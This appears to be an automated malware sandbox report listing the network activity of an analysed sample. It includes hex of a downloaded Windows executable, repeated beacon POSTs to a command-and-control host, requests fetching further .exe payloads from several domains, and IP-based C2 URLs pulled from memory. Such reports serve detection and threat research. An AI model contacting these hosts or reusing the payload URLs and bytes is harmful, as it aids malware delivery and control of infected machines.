                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 14 Jan 2022 08:26:10 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Fri, 07 Jan 2022 23:09:58 GMTETag: "61d8c846-dfcff"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 0
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rftojqy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 230Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oeicpl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 339Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gmlcwn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 253Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pmxge.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 292Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://klnnrs.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 120Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sqgycmxrcw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 127Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ordgyi.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 316Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gdpbobblv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 356Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /files/9030_1641816409_7037.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ojnph.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 147Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qnhvcpx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 191Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ukmdaxlu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 352Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cocugqsn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 361Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bcdqnjq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 343Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /install5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://quobomy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 169Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hfkcwyd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 205Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lhmfcrnoc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 153Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rwnoc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 246Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hyhfejnsaf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 139Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yupkrg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 183Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xasgjbpj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 316Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dlsrcuywsx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 324Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /6.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.7.214.171:8080
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ygpvsdtxwa.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 226Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ctudyypa.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 338Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fnqfdlb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 316Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qernbnk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 211Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lymetcvj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 230Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dwyid.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 236Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rtyuw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 206Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iymvh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 259Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://aujnrph.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 126Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qjfqvve.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 245Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://betkhbcokn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 300Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://buvim.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 281Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tuwgresxff.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 177Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://esfdrx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 357Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gimbqwejt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 198Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vqkgjg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 196Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qfojwny.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 335Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jypmxggbe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 125Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bopkt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 336Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rcosdqvkc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 285Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vpvuvi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 360Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xchjuwapl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 360Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kcgcly.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 244Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xhcmjwqukh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 336Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tbwkdtvra.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 152Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://unlkmoivsp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 311Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /files/8474_1641976243_3082.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://buyqsohhho.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 167Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lmtmt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 193Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /9.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: a0621298.xsph.ru
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://guadmgqcy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 358Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://aaxrubcof.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 212Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uswhy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 205Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vqmqnwq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 272Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ulfdnrx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 284Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vyvnhyowq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 138Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mpjbq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 236Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://smapchtl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 339Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jeacjnamm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 175Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://awifxkoma.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 236Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /files/7729_1642101604_1835.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://aoummij.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 240Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://omefw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 196Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /7.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: a0621298.xsph.ru
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bgprljhr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 345Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lptdnkjgh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 178Host: host-data-coin-11.com
                          Source: global trafficTCP traffic: 192.168.2.4:49797 -> 185.7.214.171:8080
                          Source: global trafficTCP traffic: 192.168.2.4:49882 -> 86.107.197.138:38133
                          Source: unknownNetwork traffic detected: IP country count 10
                          Source: global trafficTCP traffic: 192.168.2.4:49844 -> 40.93.207.0:25
                          Source: 5C89.exe, 00000026.00000002.987388003.0000000002FDE000.00000004.00000020.sdmpString found in binary or memory: http://178.62.113.205/capibar
                          Source: 5C89.exe, 00000026.00000002.987388003.0000000002FDE000.00000004.00000020.sdmpString found in binary or memory: http://178.62.113.205/capibard
                          Source: 5C89.exe, 00000026.00000002.987388003.0000000002FDE000.00000004.00000020.sdmpString found in binary or memory: http://185.163.204.22/capibar
                          Source: 5C89.exe, 00000026.00000002.987388003.0000000002FDE000.00000004.00000020.sdmpString found in binary or memory: http://185.163.204.22/capibarp
                          Source: 5C89.exe, 00000026.00000002.1045877274.0000000005215000.00000004.00000001.sdmp, 5C89.exe, 00000026.00000002.1043200803.0000000005200000.00000004.00000001.sdmp, 5C89.exe, 00000026.00000002.1044509910.000000000520A000.00000004.00000001.sdmpString found in binary or memory: http://185.163.204.24/
                          Source: 5C89.exe, 00000026.00000002.1045877274.0000000005215000.00000004.00000001.sdmpString found in binary or memory: http://185.163.204.24//l/f/S2zKVH4BZ2GIX1a3NFPE/71fe7726da53cb25be1ef5cfcccec20e728d94fe
                          Source: 5C89.exe, 00000026.00000002.1045877274.0000000005215000.00000004.00000001.sdmpString found in binary or memory: http://185.163.204.24//l/f/S2zKVH4BZ2GIX1a3NFPE/724da1c439bafff55600e6bd8e8cc799e96c0335
                          Source: 5C89.exe, 00000026.00000002.1049327482.0000000005239000.00000004.00000001.sdmpString found in binary or memory: http://185.163.204.24//l/f/S2zKVH4BZ2GIX1a3NFPE/724da1c439bafff55600e6bd8e8cc799e96c03351
                          Source: 5C89.exe, 00000026.00000002.1043200803.0000000005200000.00000004.00000001.sdmpString found in binary or memory: http://185.163.204.24/22
                          Source: 5C89.exe, 00000026.00000002.987388003.0000000002FDE000.00000004.00000020.sdmpString found in binary or memory: http://185.163.45.70/capibar
                          Source: 5C89.exe, 00000026.00000002.987388003.0000000002FDE000.00000004.00000020.sdmpString found in binary or memory: http://185.163.45.70/capibarvg
                          Source: WerFault.exe, 0000000F.00000003.800924790.0000000004DB9000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000002.804189922.0000000004DB9000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000002.825450760.000001C021700000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                          Source: svchost.exe, 0000001C.00000002.825450760.000001C021700000.00000004.00000001.sdmpString found in binary or memory: http://crl.ver)
                          Source: svchost.exe, 0000001C.00000003.801590976.000001C02177D000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.801757401.000001C021C02000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.801683194.000001C0217BE000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.801724830.000001C02179E000.00000004.00000001.sdmpString found in binary or memory: http://help.disneyplus.com.
                          Source: 5C89.exe, 00000026.00000002.1045877274.0000000005215000.00000004.00000001.sdmpString found in binary or memory: https://185.163.204.22/capibar
                          Source: 5C89.exe, 00000026.00000002.1049327482.0000000005239000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;g
